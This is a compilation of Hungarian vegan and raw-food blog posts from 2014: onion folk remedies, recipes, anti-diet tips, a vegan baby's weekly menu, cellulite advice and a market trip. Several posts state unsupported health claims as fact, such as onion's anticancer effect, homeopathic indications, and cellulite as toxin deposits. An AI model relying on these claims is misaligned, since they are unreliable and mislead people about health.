a természetes bélflórát, javítja az általános emésztést. Kiváló hatással bír a hólyaggyulladás és a vesegyulladás esetén, mivel azok kórokozóira is hat. A hagymabor alkalmas a vizeletképző szervek átmosására és a felgyülemlett víz eltávolítására. Ebből adódóan csökkenti az ödémát. Hagymaszirup készítése során a kipréselt nyers vöröshagymalevet keverjük el mézzel és ezt kanalazzuk betegség esetén. De megelőzésre is kiváló. Amennyiben a hagymát felvágjuk, remekül bevonzza a levegőben lévő mikróbákat, és illóolajai az éjszakai alvást is nyugodtabbá teszi (tegyük a felvágott hagymát fejmagasságba). Szív- és érrendszer Kedvezően hat az érelmeszesedés megelőzésében, a koleszterinszintre . Ha belegondolunk, hogy mi volt az aratók tarisznyájában: szalonna és hagyma. Így a zsíros szalonnát remekül kompenzálja a hagyma gyógyhatása, segíti a zsír emésztését, megakadályozza annak lerakódását. Antibakteriális Baktériumellenes hatását már Pasteur is leírta, orosz tudósok 150 növény közül a fokhagymát és a vöröshagymát találták a legerősebb baktériumölőnek. Rákellenes A rákellenes hatása is számottevő, mivel a kénvegyületei gátolják egyes tumorsejtek növekedését (nyelőcső, gyomor, vastagbél, tüdő). Külsőleg is hatásos Külsőleg , ha sebekre, pattanásokra, kelésekre tesszük, annak érlelő hatása hamarabbi gyógyulást eredményez. Égési sérülés esetén nyerjük ki a hagyma levét, a kapott lében áztassunk be egy gézt, és helyezzük az égett felületre. Fülfájás esetén a felszeletelt hagymát tegyük egy ruhába, majd ezt a fülhöz. Kívülről ezt melegítve az illóolajat befelé párologtatja. De a fülborogató szett is segítségünkre lehet. A hagyma héjából készült főzet szép vöröses árnyalatot ad a barna hajnak. A hagymapakolás bevethető reumatikus és ízületi fájdalmak esetén is. Egy hagymát vágjuk apróra, egy csipet sóval készítsünk belőle pépet. Nyers hagymát helyezhetünk szemölcsre, tyúkszemre is, de zúzódások, rándulások esetén is segítségünkre lehet. Allium cepa, mint homeopátiás szer Lehet sokunknak ismerős homeopátiás szere az Allium cepa (D6-C30). Ez egy tüneti szer, a következő esetekben bevethető: - bőséges, híg, maró orrváladék (mely kisebesíti az orrszárnyat) bőséges, - NEM maró könnyezés heves tüsszögési roham orrcsöpögés n - átha - fejfájással - csiklandozó érzés a gégében - krákogás - javulás: friss levegőn - rosszabbodás: meleg szobában, reggel felkeléskor Úgyhogy fogyasszunk minden nap friss vöröshagymát, a testünk meghálálja.
Hamis krémtúró gyümölcsösen (vegán)
Sok vegán ismeri ezt a könnyed, gluténmentes finomságot, ahogy a hamis túrógombóc, úgy ez is kölesből, a lúgosító csodaszerből készül. Minden évszakban kiváló desszert, mivel bármilyen gyümölccsel elkészíthető. Mivel barackszezon van és rajongok a nektarinért, így ezzel készítettem. Akkora gödöllői nektarinokhoz jutottam, amekkora egy szép megtermett alma. 1-2 még annál is nagyobb volt. Finom édes íze rendkívül jól feldobta a krémtúró ízét.
A recept
Hozzávalók:
o 1 kisebb bögre köles
o víz
o növényi tej
o édesítő (nyírfacukor, gyümölcscukor, stb.)
o vanília
o citrom
o gyümölcs
Elkészítés:
A kölest alaposan átmossuk, majd kb. háromszoros mennyiségű vízben feltesszük főzni. Mikor már elfőtt a víz, öntünk hozzá annyi vizet, amennyi éppen ellepi és tovább főzzük. Időközben hozzáadjuk a nyírfacukort. A citromot alaposan megmossuk, héját belereszeljük, ha úgy érezzük, hogy nem elég citromos, akkor a citromból még facsarhatunk bele. A vaníliát kikaparjuk, szintén hozzáadjuk. Addig főzzük, míg krémtúrós-pépes állaga nem lesz. Ízérzéke mindenkinek más és más, ki édesebben, ki citromosabban szereti. Idénygyümölccsel (most nektarinnal) tálaljuk.
Reggelire is elkészíthetjük, de desszertnek is. Pohárkákba kiporciózva, hűtőben pihentetve igazán finom nyári desszert.
Fogyókúra, avagy a nagy átverés!
2014. augusztus 5. Gréta konyhája
Ördögnyelv, szűztea, tejsavó ital, káposztaleves kapszula, csökkentett szénhidrát tartalmú termékek, zero cukor, ilyen csodalötty, olyan rezgő masina. Ki ne találkozott volna ezekkel a nevekkel, elég csak bekapcsolni az internetet, minden oldalon, szinte az arcunkba nyomják, hogy majd ezek lefogyasztanak, ezáltal megoldják minden gondunkat. Bosszantó ez a nyílt legális hazugság, és az még szomorúbb, hányan dőlnek be neki. Pedig a recept egyszerű. Soha ne fogyókúrázz, vagy diétázz!!! Ha egyre másra vásárolod a csodaszereket, ha éhezel, órákat kínzod magad az edzőteremben, kalóriát számolsz, miközben a bűntudat életed mindennapi részévé válik, és te ahelyett, hogy jobban éreznéd magad, egyre rosszabbul vagy, immunrendszered gyenge, és a mérleg is csak alig alig mozdul, akkor nem nehéz kitalálni, hogy rossz úton jársz. Egy egy fogyókúra, nem csak az önbecsülésedet és az anyagi helyzetedet tépázhatja meg, de az egészséged is oda lehet. Én, aki kipróbáltam a világ összes fogyókúráját (4-5kg felesleg miatt) és diétáját, ingyen és nagy szeretettel adom nektek át nektek a nagy titkot az egészség felé 1. Ne mástól várd a megoldást! A te tested a te templomod, senki más nem ismerheti jobban, mint te magad. Azáltal, hogy hajlandó vagy felfedezni tested működését, elindulhatsz az önismeret és az önszeretet útján, ami nélkül nem is érezhetnéd jól magad. 2. A tested érted van, nem ellened! Amikor megérted azt, hogy a tested egy tökéletes veled együtt, elvileg tökéletesre tervezett intelligens organizmus öngyógyító képességgel, akkor eljuthatsz oda, hogy nem pusztítod, hanem szövetségeseddé teszed. 3. Menj olyan helyekre, ahol friss, lehetőleg vegyszermentes feldolgozatlan táplálékokat találsz. Érezd, szagold, tapintsd, és azt válaszd, amit szeretnél a tested részesévé tenni. A piac erre tökéletes helyszín. 4. Menj haza, tedd ki őket a konyhapultra, és képzeld el, mit szeretnél belőlük készíteni. Lehetőleg hagyd nyersen, vagy a lehető legkevesebb feldolgozott, finomított élelmiszerrel keverd őket. 5. Étkezés előtt, áldd meg, és tisztítsd meg az ételt a negatív rezgésektől. Étkezés közben pedig figyeld, milyen az étel íze, rágd meg, alaposan, és olyan tudatban nyeld le, hogy minden része pont olyan sejtedhez jut el és táplálja azt, amire hivatott volt létrejönni. 6. Délig, a salaktalanító időszakban egyél minél több magas víztartalmú gyümölcsöt, préselt,vagy turmix formájában, lehetőleg cukor, és állati eredetű dugító ételek nélkül (joghurt, tej stb) 7. Déltől estig több részletben edd meg a tápláló gabonákat, hüvelyeseket, zöldségeket, növényi fehérjéket. 8. Csak akkor egyél, ha éhes vagy, és csak addig, ameddig éhes vagy. 9. Minden étkezés előtt egyél friss salátát, mert tisztít, és telít, így kevesebbet eszel másból.
10. Nassolás helyett igyál tiszta (revers osmosis, vagy desztillált vizet), legalább 3 litert egy nap. 11. Ha házon kívül eszel, olyan helyet válassz, ahol szeretettel, tiszta ételeket készítenek tiszta alapanyagokból (Gréta konyhája szeptembertől pl ) 12. Étkezés előtt fél órával igyál utoljára. Étkezés elteltével is várj fél órát. 13. Minden nap mozogj, minimum fél órát, de csak azt csináld, amit imádsz!!!! Nem mindenkinek jön be ugyanaz. Nekem a pilates és a jóga, lehet neked a futás. 14. Lefekvés előtt, és felkelés után végezz légzőgyakorlatokat, ereszd el azt ami fáj, ami bánt, a haragot, a szenvedést, mert egyik sem tartozik hozzánk 15. Fogadd el, hogy ott jársz az úton ahol jársz, ne sürgesd magad, légy türelmes, de legfőképpen hálás, hogy élsz! Mindezt írta egy 36 éves nő, anya, aki kizárólag növényi étrenden él, tudatosan, de szabadon étkezik, nem hajlandó kalóriát számolni, sem ön sanyargatni magát semmivel. Jókat eszik, nem dől be a hazugságoknak, és sosem hízik, mert nem kell lemondania semmiről. Szereti magát. Boldog életet él. Mert így döntött. Ezt kívánom Neked is!
Táplálj helyesen édesanyám! (5. rész)
2014. augusztus 5. Zizi kalandjai
Előtte / Utána
Az a bizonyos csokipuding, aminek az utolsó falatjáért harcolt anya és fia, és ami az első szülinapi torta krémje is volt
A legutolsó bejegyzés óta elég sok idő eltelt… fejemben a sok-sok információ, igyekszem részletesen leírni nektek. Többen jeleztétek, hogy egy heti menüre is kíváncsiak lennétek, hát, akkor egy ilyet is leírok nektek. Még jó, hogy születése óta (!!!) írom, hogy mikor mit evett Ádi, szóval dokumentálva van az étkezés, így a heti menü megosztása sem akadály!
Májusban végre megújult a természet, ami a piacok kínálatán is látszódott, így egyre több újdonságot tudott kipróbálni Ádi. Nagy sikert aratott minden gyümölcs, amit evett: eper, málna, ribizli, szeder, cseresznye, meggy, szilva, őszibarack, sárgabarack, sárgadinnye. Talán a görögdinnyéért nem rajong annyira, de azt is megeszi. A legnagyobb kedvenc egyértelműen a meggy és az áfonya. Nem tud belőlük eleget enni… Áfonyából képes akár 200 grammot is benyomni egyszerre. Képzelhetitek, hogy 200 gramm áfonya után milyen színű lesz a végtermék… hát, lila!
A zöldség választékból szinte mindent kipróbáltunk, ami szóba jöhetett: spárga, zöldborsó, zöldbab, tök, cukkini, padlizsán, paradicsom (ez gyümölcs!), paprika, kukorica, káposzta, uborka, olívabogyó, zeller, karalábé, karfiol, brokkoli, avokádó (ez gyümölcs!). A spenót, mángold, petrezselyem, sárgarépa továbbra is szerepel az étlapon és alkalmanként most már burgonya is kerül a tányérra. Az egyedüli, ami nem nagyon nyerte el a tetszését, az a sóska volt, de hát ez egy eléggé megosztó zöldség.
Kipróbáltuk a zöld turmixot is. I. csinált egy fantasztikusat: mángold, banán, alma, kevés citromlé, víz, rizstej összekeverve… az arányokat ne kérdezzétek, de tényleg nagyon finom volt, ezért is aratott sikert Ádinál. Második alkalommal én csináltam, ha jól emlékszem, nem volt itthon alma, így az nem került bele és nem is lett olyan ízletes, Ádinak sem ízlett annyira, de nem adjuk fel! Kineveztük apát zöld turmix specialistának, így ezért az italért és más smoothie-ért ő a felelős. Készített már málna rizstej smoothie-t (turmixolás, majd magok leszűrése), Ádi ezt is itta nagyon!
Gyümölcsökön és zöldségeken kívül Ádi eszik tésztát (többnyire durum- vagy tönkölylisztből készültet), kölest, barnarizst, jázminrizst, kukoricadarát, rozs-vagy teljeskiörlésű tönkölylisztből készült kenyeret (lehetőleg élesztőmenteset), zabpelyhet, rizspelyhet, tönkölydarát, lencsét, csicseriborsót, sörélesztő pelyhet (B12 vitamin pótlásra), vegán sajtot (nem szójaalapú, nagyon-nagyon finom, az egész család imádja!). Mandulatejet- és rizstejet (cukormentes) smoothie-k készítéséhez használok, valamint a reggeli kásához. Külön magukban nem szokta inni őket, de biztosan ki fogjuk próbálni, de most nyáron jobbnak látom frissítő gyümölcsleveket és vizet adni szomjoltásra. Rágcsált már diót és egy kis kesudiót.
Többen kérdeztétek, hogy mivel pótoljuk az állati fehérjét. Különösebben nem görcsölök rá erre a témára, de néhány dolgot érdemes szem előtt tartani vegán táplálkozás esetén. Már ebben a cikkben is leírtam, vagyis idéztem, hogy “Az ember az emésztés során a fehérjéket aminosavakra bontja le, ezekből építi fel a saját fehérjéit. Nem az elfogyasztott fehérjét építi be tehát, hanem az aminosavakat. Ezért minden alapot nélkülöz az a kijelentés, miszerint az állati fehérje azért jobb, mint a növényi, mert közelebb van szerkezetében az emberihez. A másik alaptalan tévhit, hogy a növények nem teljes értékű fehérjét tartalmaznak, ezért rosszabb minőségűek. Ez a mítosz az esszenciális aminosavakra vezethető vissza. Nyolc aminosavról van szó, amelyeket a szervezet nem tud előállítani, ezért mindenképpen kívülről kell őket a szervezetbe vinni. A természet bölcs, minden élőlény ugyanazokból az aminosavakból épül fel, így a növényekben és az állatokban egyaránt megtalálhatóak az ember számára esszenciális aminosavak. Igaz, az állati fehérjék mind a nyolc aminosavat tartalmazzák, a növények pedig általában egyszerre nem az összeset. Azt nevezi a természettudomány teljes értékű fehérjének, amely az összes, az adott élőlény számára esszenciális aminosavval rendelkezik. A növények közül ilyen a kelbimbó, a sárgarépa, a kukorica, a karfiol, az uborka, a tök, a burgonya, a zöldborsó, az összes dióféle, a szezám- és napraforgómag, valamint a paradicsom fehérjéi. Nem szükséges azonban minden étkezés alkalmával teljes értékű fehérjét fogyasztani, de még naponta sem. A szervezet ugyanis “képes bármilyen aminosavhoz hozzájutni a saját tartalékából, ha az egy adott étkezésből hiányzik is.” – Dr. E. S. Nasset” (Forrás: Napfényes Étterem)
Tehát a fent nevezett 8-10 növényből szezon alapján igyekszem minél többet adni Ádinak. Ezenkívül fontos az ételek párosítása (ez a komplettálás) is. Például a gabonafélék és hüvelyesek együttes fogyasztásával teljesértékű fehérjéhez jutunk (pl: bab-zab fasírt, zöldborsós rizottó). Még többet a komplettálásról és az ételek párosításáról itt olvashattok.
Nem csak bűvölte a spenótot, hanem meg is ette
Mindent mértékkel fogyasztunk és a hangsúly a harmónián van. Ádi nagyon jó étvágyú kisfiú, öröm nézni, ahogyan eszik. Egyenesen megkívánja az ember az ételt, olyan jóízűen falatozik, nyugodtan, kényelmesen. Jól fejlődik, egészséges, zsurmó, mozgékony, igazán jól táplált baba. Továbbra is igyekszem tartani a vegán étrendet számára, azonban tudom, hogy bizonyos szituációkban nehéz kivitelezni, hogy teljesen kizárjuk a tojást vagy tejtermékeket. Ha így lesz, nem fogok belőle problémát csinálni, ha alkalmanként eszik egy-két olyan dolgot, amelyekben ezek megtalálhatók. A nagy kérdés, amit mindig megkapok, hogy ha Ádi kér húst, akkor adok-e majd neki. A válaszom természetesen igen, hagyni fogom, hogy kipróbálja, de valószínűleg a nagyi fogja elkészíteni neki az ételt.
Tökfőzelék készítésekor egyszer csak elcsent egy darab meghámozott tököt az asztalról és nekiesett… a tapasztalás a legfontosabb!
Amit még szintén nem evett és érdemes megemlíteni, az a cukor. Ezt még semmilyen formában nem evett, de még mézet, juhar- vagy agavé- vagy rizsszirupot sem adtam neki és ahogy ezt a környezetemben tapasztalom, igen jó döntésnek bizonyult. A cukor teljesen megváltoztatja az ember ízérzékelését és egy alma már nem fog olyan édesnek tűnni, ha rendszeres “cukorfogyasztókká” váltunk. Ezt is igyekszem elhúzni, ameddig lehet, aztán majd mértékkel adni neki kókuszvirág cukrot, nádcukrot, juharszirupot, természetesen többnyire sütikbe belesütve.
És akkor lássunk egy heti menüt (követem a szezonalitást, de ez most több hét menüjéből lett összemixelve, ezért fordul elő benne az eper és az őszibarack is egyszerre)…
A reggeli kásák rizs- vagy mandulatejjel készülnek, adok hozzá csipet fahéjat, egy teáskanál mandulavajat és gyümölccsel tálalom. Tízóraira többnyire egyféle gyümölcsöt eszik, de előfordul, hogy főzés közben adok neki egy darab répát is, hogy elrágcsálja. Az ebéd szinte mindig főtt étel és az egyszerűségre törekszem, hogy minél gyorsabban legyen kész. Uzsonnára többféle gyümölcsöt eszik, persze nem egyszerre, hanem az ebéd és a vacsora között akár kétféle gyümölcsöt is eszik, meg lehet, hogy még kölesgolyót is rágcsál. A vacsora az esetek többségében hideg, kenyér valamivel megkenve, zöldségekkel tálalva.
1. nap
Reggeli: banános palacsinta
Tízórai: áfonya
Ebéd: tökfőzelék vegán sajttal
Uzsonna: alma, málna, kölesgolyó
Vacsora: vegazsíros kenyér, paradicsom, avokádó
2. nap
Reggeli: tönkölykása almával
Tízórai: eper
Ebéd: cukkinis lecsó barnarizzsel
Uzsonna: cukor- és élesztőmentes szilvás rétes (biopiacról)
Vacsora: vegazsíros kenyér, paradicsom, paprika, avokádó, vegán sajt
3. nap
Reggeli: zabpehely kása banánnal
Tízórai: nektarin
Ebéd: brokkoli pestós tészta (sörélesztő pehely a tetejére szórva)
Uzsonna: áfonya, kölesgolyó
Vacsora: humuszos kenyér, paradicsom, olívabogyó, avokádó, vegán sajt
4. nap
Reggeli: rizspehely kása őszibarackkal
Tízórai: áfonya
Ebéd: zöldségleves teljeskiörlésű vegán betűtésztával
Uzsonna: sárgabarack, málna
Vacsora: vegazsíros kenyér, paradicsom, brokkoli csíra, avokádó, vegán sajt
5. nap
Reggeli: tönkölykása banánnal
Tízórai: őszibarack
Ebéd: tökfőzelék bab-zab fasírttal
Uzsonna: sárgabarack, áfonya, kölesgolyó
Vacsora: lencsepástétomos kenyér, paradicsom, avokádó, vegán sajt
6. nap
Reggeli: tönkölykása őszibarackkal
Tízórai: vegán cukormentes szilvalekváros palacsinta (biopiacon)
Ebéd: lecsó polentával
Uzsonna: őszibarack, kölesgolyó
Vacsora: szezámmagpástétomos kenyér, paradicsom, paprika, avokádó
7. nap
Reggeli: rizspehely kása banánnal
Tízórai: málnás rizstejes smoothie
Ebéd: borsófőzelék karfiol-quinoa fasírttal
Uzsonna: őszibarack, kölesgolyó
Vacsora: vegazsíros kenyér, olívabogyó, paradicsom, avokádó
*****
Ha kérdésetek van, tippetek, ötletetek, esetleg egy tuti baba receptetek, írjátok meg kommentben! A leírtak a saját tapasztalataim (és tájékoztató jellegűek!) és a mások által leírt, általam elfogadott nézeteket tükrözik. Kérjünk tanácsot, segítséget másoktól, szakemberektől, olvassunk utána a hozzátáplálás/baba étkeztetés témájának, aztán hallgassunk az anyai megérzésünkre is, figyeljük meg, hogy mi ízlik a babának, vállaljuk fel a döntésünk felelősségét és cselekedjünk saját belátásunk szerint.
Majmos előke, tálka, tányér és kanál: {Monkie}.
Táplálj helyesen édesanyám! (1. rész)
Táplálj helyesen édesanyám! (2. rész)
Táplálj helyesen édesanyám! (3. rész)
Táplálj helyesen édesanyám! (4. rész)
Narancsbőr, csak a sütibe jó!
2014. július 29. Gréta konyhája
Napi életmód tippem: 10+1 tipp, a feszes, formás lábakért! Ha csak nem születtél Giselle Bündchennek, valószínű ismered a narancsbőr, más néven cellulite fogalmát, és nem csak a női magazinok hasábjairól. Sok levelet, kérdés kapok ebben a témában, és higgyétek el, egészen fiatal, vékony lányok is szenvednek tőle. A cellulit a bőr irha rétegében lerakódó salakanyagokat jelenti, amelyek a környező szövetekből magukhoz vonják a vizet, és egyre nagyobb gömböcskéket alakítanak ki. A felgyülemlett nedvesség ödémát okoz, a megduzzadt csomók egymással találkozva felszakítják a rostok rácsszerkezetét, így a bőr felülete a narancs héját utánzóan egyenetlenné válik. Okai sokfélék lehetnek, mint öröklődött szociális tényezők (családi, életmódbeli szokások), ösztrogén hormon (soha ne szedj fogamzásgátló tablettát!), nyirokkeringési zavar, testsúlynövekedés, helytelen és rendszertelen táplálkozás, kevés folyadékfogyasztás, mozgáshiány, stressz. Aki azt mondja, a narancsbőr egy krémtől, egy kapszulától, egy diétától, vagy egy rázkódó állványtól fog eltűnni, az hazudik. De jó hír, hogy tehetünk dolgokat a visszaszorítása érdekében, és ha nő vagy, és zavar a dolog, akkor minél hamarabb, annál jobb, hiszen az évek ezen nem segítenek
Ami viszont igen, azt 11 pontban összegyűjtöttem nektek, az elmúlt 9 év tapasztalatából. Nekem is van, de nem látszik, mert nem engedem neki :)) A lenti listából kísérletezhettek kedvetekre, de ki is egészíthetitek 1. Tiszta víz (2-3 liter naponta) revers osmosis, vagy desztillált víz A tiszta víz a legjobb oldószer, a káros salakanyagok, mérgek kimosásában. Dúsíthatjuk friss citrommal, vagy friss gyömbérrel. 2. Jóga és pilates Bármely 30 perces gyakorlat segíteni fog, már igen rövid távon látványos eredményeket lehet elérni. Én imádom még az otthon reggelente könnyedén elvégezhető 5 tibeti gyakorlatot, a napüdvözletet( Surya Namaskar), a pilatest, pedig a you tube-ról töltöm le. Mindkettő csodásan formázza a combokat. 3. VEGÁN életmód! Légy vegán, ha már nem az állatok miatt, akkor hiúságból Ahogy áttértem 4 évvel ezelőtt, rá három hónapra már nem látszott narancsbőröm, pedig genetikailag laza kötőszöveteket örököltem. A tejtermékekben sok a rejtett cukor, és növekedési hormon, és ösztrogén ami természetesen a húsra és a tojásra is elmondható. 4. Pulzusszám emelő időtöltések. Olyat válassz, ami örömet okoz. Ha nem szeretsz futni, akkor sétálj helyette, vagy aerobikozz, vagy biciklizz, spinningelj, vagy egyéb izzasztó gyakorlatok is hatásosak, még ki sem kell kelned az ágyból 5. Apropó izzadás! Szaunázz heti egyszer 1-2 órát, szuperül felpezsdít és méregtelenít! 6. Igyál minden nap, lehetőleg éhgyomorra frissen préselt zöldség és gyümölcsleveket, mert ezek mossák át a sejteket igazán, és töltik fel éltető enzimekkel. 7. Ételeid legalább 50%-a, nyáron 70%-a legyen nyers, termelői piacon beszerzett méregmentes gyümölcs, zöldség, salátaféle. 8. Legalább tavasztól őszig a legtöbb helyre járj gyalog, mert a séta nagyon jól formázza a combokat, ezáltal faragja a narancsbőrt. 9. Egyél minél több zöld színű ételt (saláta, spenót, petrezselyem, sóska, brokkoli), mert a bennük lévő klorofill mind mind kaparja a zsírt-vizet a cellákból. 10. Fogyassz kevesebb de jó minőségű zsírt, kerüld a túl sok olajos mag fogyasztást. Használj konyhádban szőlőmag, vagy/és lenmagolajat. +1 Kényeztesd magad havi egyszer egy testet lelket frissítő masszázzsal, de lehet speciális cellulit vagy nyirokmasszázsokat is igénybe venni, ha a többit megtetted, ez sokat fog segíteni. Fogadjuk el magunkat olyannak amilyen, de soha ne fosszuk meg a lehetőséget magunktól, hogy fittebbek, és szebbek legyünk. Elfogadom magam, hogy most ez van, és ha változtatni szeretnék, akkor mindent megteszek, jókedvűen, optimistán, és sikerülni fog. Csak egy a biztos, az örök változás. ( a cellulit nem ) Boldog napot!
Őszibarackos hajdinakása
2014. július 27. Éltető ételek
Egy újabb egyszerű recept. Egyedüli meló a hajdina csíráztatása. Ilyenkor nyáron kifejezetten jó csírákat fogyasztani, mert hűtő hatása van. Szezonálisan bármilyen gyümölccsel készíthetjük, most az őszibarack csücsült a hűtőben, így ez lett a reggelim. Hozzávalók: - 2 őszibarack - 2 evőkanál hajdinacsíra - fahéj, vanília - 2 evőkanál chia mag (nemcsak remekül sűrít, hanem szuper omega3 forrás) - kis marék aszalt meggy - tetejére: őszibarack és aszalt meggy Elkészítése: turmixoljuk össze, a tetejét szórjuk meg a gyümölcsökkel.
LÉT-REFORM bejglik
2014. július 27. Mindennapi ételeink
Tudom, tudom, a bejgli téli édesség, de ez jól behűtve, esetleg egy kis vegán vaníliafagyival nyáron is nagyon finom és egészséges csemege! Most, hogy itt a kicsit hűvösebb idő, önmagában is nagyon finom. A klasszikus diós, ill. mákos ízesítésűből van élesztős és élesztőmentes változat is, míg az élesztőmentesek közt gesztenyéset is találunk. Mi élesztőmentes mákosat és gesztenyéset kóstoltunk. Bio gesztenyés bejgli (élesztőmentes) Csicsókával és almával édesített finomság. Összetétele: Teljes őrlésű tönkölyliszt, koptatott tönkölyliszt, növényi margarin, csicsóka, natúr gesztenye, alma, szódabikarbóna, só. Nekünk ez egy kicsit natűr volt, de egy kevés házi lekvárt kentünk rá, és nagyon finom lett. A tésztája cserébe viszont finom omlós. Bio mákos bejgli (élesztőmentes) Ez nagy kedvencünk volt, jó sok töltelék található benne, finoman elkészített. Található benne mazsola, ill. citromhéj teszi teljessé az élvezetet :-) Összetétele: Teljes őrlésű tönkölyliszt, koptatott tönkölyliszt, növényi margarin, csicsóka, mák, alma, mazsola, citrom, szódabikarbóna, só.
Fiume piacán járva....
Úgy is írhatnám, hogy Rijeka piacán járva, de a Fiume név talán többeknek ismerős. Ha máshonnan nem, a Fiumei útról, ahol Budapest legszebb temetője, temető-parkja helyezkedik el. De kanyarodjunk vissza Rijeka piacához.
A kettős név onnan ered, hogy egy időben a város bizonyos része, mondhatni az egyik fele olasz fennhatóság alá tartozott, míg a másik szerb-horvát-szlovén irányítás alá. Később pedig az egész város Olaszország, majd Horvátország határán belül volt. A Fiume olasz szó, akárcsak a Rijeka horvát főnév folyót jelent, ami nem véletlen, hiszen a Recsina itt ömlik a tengerbe. Persze nem csak az olaszoknak és a délszlávoknak volt szerepe a város életében. Bizonyára sokan emlékszünk még arra történelemórákról, hogy valaha Magyarországnak is az Adria volt a tengere. A város, Rijeka/Fiume ekkor fénykorát élte. Fejlődött az infrastuktúra, számos épületet ekkor emeltek. Némi magyar vonatkozása is van Horvátország egyik legnagyobb kikötővárosának, konkrétan két dolgot említek meg: 1914-ben itt készült Magyarország legnagyobb csatahajója, a tragikus sorsú Szent István, valamint itt született Kádár János. (forrás: Wikipédia)
Nos horvátországi utazásaink során szerettem volna felkeresni a rijekai piacot. Interneten keresgéltem útleírásokban, de megnyugtató és elégséges információt nem találtam. Ezért most gazdagítom tapasztalatommal a webet. :)
GPS vezérlésével KRK szigete felől érkeztünk a városba, s elég gyorsan megláttuk az autónkból a piacnak tűnő kofákat, akik zöldségeiket és gyümölcseiket árulták. Megörültünk a pillanatnyi látványnak és a közelben fellelt parkolóba leparkoltunk (7 kuna/óra). Gyalogosan elindultunk felfedezni a piacot, s közeledve némi csalódottság lett úrrá rajtam, mivel úgy tűnt, ez inkább bolhapiac, ugyanis szedett-vedett holmijukat árulták az emberek, majd következett néhány zöldség és gyümölcskereskedő, és ennyi. Furcsállottam magamban, egy hatalmas kikötővárosnak ilyen csekély lenne a piaca? Splitben is szép, kiterjedt piac volt, Rijekában is így kellene lennie. Nem is vettünk semmit. Viszont gyalogosan tovább álltunk, remélve, hogy van máshol piac. A korzóra, Rijeka sétálóutcájára tévedtünk. McDonalds, Rijekai Rádió épülete és találtunk egy városi térképet, ahol sikerült felfedeznem: Trznica (magyarul: piac). Térképen kiszúrt hely felé vettük lépteinket és hamarosan megláttuk a zöldes színűre festett épületet. Egy aluljárón keresztül megközelítettük és már ott is láttuk a portékáikat áruló embereket. Olívaolaj - házi sajtolású olívaolaj volt a fő cél, amit hamar meg is leltünk több helyütt. Vettünk is belőle. Nem bántuk meg. :) Igazi dús olívás íze van.
A piac 3 fő zöldes színű épületből áll. Az elsőben tésztákat, olívabogyókat, édességeket, stb. árulnak. A másodikban hentesek portékáit és az utolsó az igazi halpiac. Ilyen halpiacon még nem jártam. Ugyan nem eszünk halat , de ilyet eddig még nem láttam. Ezért is készítettem képeket róla. Mindenesetre a látvány csak jobban megerősít abban, hogy a jövőben sem kívánok azon "vegetáriánusok" közé tartozni, akik halat esznek. Sem rendszeresen, sem ünnepekkor.
Továbbiakban beszéljenek helyettem a képek:
Képek a zöldség-gyümölcs piacról:
Egyéb portékák belső csarnokában:
Képek a halpiacról:
FIGYELEM! EGYES VEGETÁRIÁNUSOK SZÁMÁRA MEGRÁZÓ KÉPEK JÖHETNEK A HALPIAC CÍMSZÓ ALATT!
A térkép és a közeli kikötő-részlet:
Mesterkurzus a Nyersétel Akadémián!
2014. július 21. Gitta nyersétel blogja
A Nyersétel Akadémia küldetésének érzi, hogy minél több ember ismerje meg az élő ételek csodálatos hatását. Célunk, hogy minél több emberhez, minél több városba és településre jusson el a tudás, az ismeret, és minél több helyen nyíljon nyers ételeket kínáló üzlet, étterem. Ezek sikerének kulcsa a minőség, a szakértelem, a szép és finom ételkínálat. Ehhez nyújtunk segítséget a Nyersétel Akadémia Mesterkurzus képzési programjával, melyet elsősorban szakembereknek kínálunk, de sikeresen részt vehet rajta bárki, akár szakácsképesítés nélkül is. A képzés tematikáját én állítottam össze. A Mesterkurzus előadói, tanárai pedig a Nyersétel Akadémia munkatársai és én leszünk. Programunk egyénre szabott, az egyéni igényeknek megfelelően alakítjuk a képzést. Miben nyújtunk segítséget: - ha szeretnél nyers vegán éttermet nyitni megtanítjuk egyrészt hogyan kell nyers vegán ételeket készíteni, ízesíteni, tálalni, másrész hogyan kell egy nyerskonyhát üzemeltetni. Továbbá, képes leszel saját recepteket és menüsorokat összeállítani, a bejövő vendégek kérdéseire válaszolni. - Ha már van éttermed, és szeretnéd a választékot bővíteni, vagy különleges, új ételeket betenni a kínálatba, vagy szeretnél új ötleteket meríteni akár ízesítésben, akár tálalásban, ebben is segítünk. - Ha szeretnél saját magad aszalványokat készíteni, és értékesíteni, megtanítjuk az aszalás legfontosabb trükkjeit, fortélyait. Olyan recepteket adunk, amik továbbfejlesztésével kialakíthatod a saját ízvilágodat, és felépítheted saját aszalvány készítő és értékesítő üzletedet. - Ha szeretnél mester szinten tudni a nyers ételekről, minden üzleti szándék nélkül, akkor is várunk, igényesen és szaktudással fogod tudni elkészíteni a nyers fogásokat akár magad, akár a családod számára. Bármelyik opciót választod, tagja leszel a Nyersétel Akadémia támogatottjainak, ami azt jelenti, hogy hírt adunk a nagyvilágnak (már több, mint 20 ezres táborunknak) létezésedről, tevékenységedről, fejlődésedről, segítünk és támogatunk a képzés után is. Szerepelni fogsz referencia listánkon! Mit tartalmaz a képzési program: - elméleti ismeretek (enzimek, lúgosítás, vitaminok, történelmi áttekintés, válaszok a gyakran feltett kérdésekre) - nyerskonyha alapismeretek - menü összeállítási ismeretek - gyakorlati képzés: alapok, turmixok, levesek, főételek, édességek, aszalványok - esztétika, tálalás, fotózás, marketing A képzéseinken részt vevők OKLEVELET kapnak, melyben igazoljuk, hogy részt vettek a Nyersétel Akadémia Mesterkurzusán. További információk: gitta@nyersetelakademia.hu
Málnafagyi
Nagyon nagyon meleg van, így benéztem a fagyasztóba, mit találok ;) És láss csodát! A télen vett fagyasztott málna még mindig a sorsára várt ;) Mit mondjak? Remek szolgálatot tett most ;) Hozzávalók: 25 dkg fagyasztott málna 2 ek méz Beletettem a késes robotgépbe, és addig forgattam, amíg így összeállt :) Isteni!!!Kategória:édességek, Nyers ételek, Receptek
Egy... megérett a meggy
2014. július 15. Éltető ételek
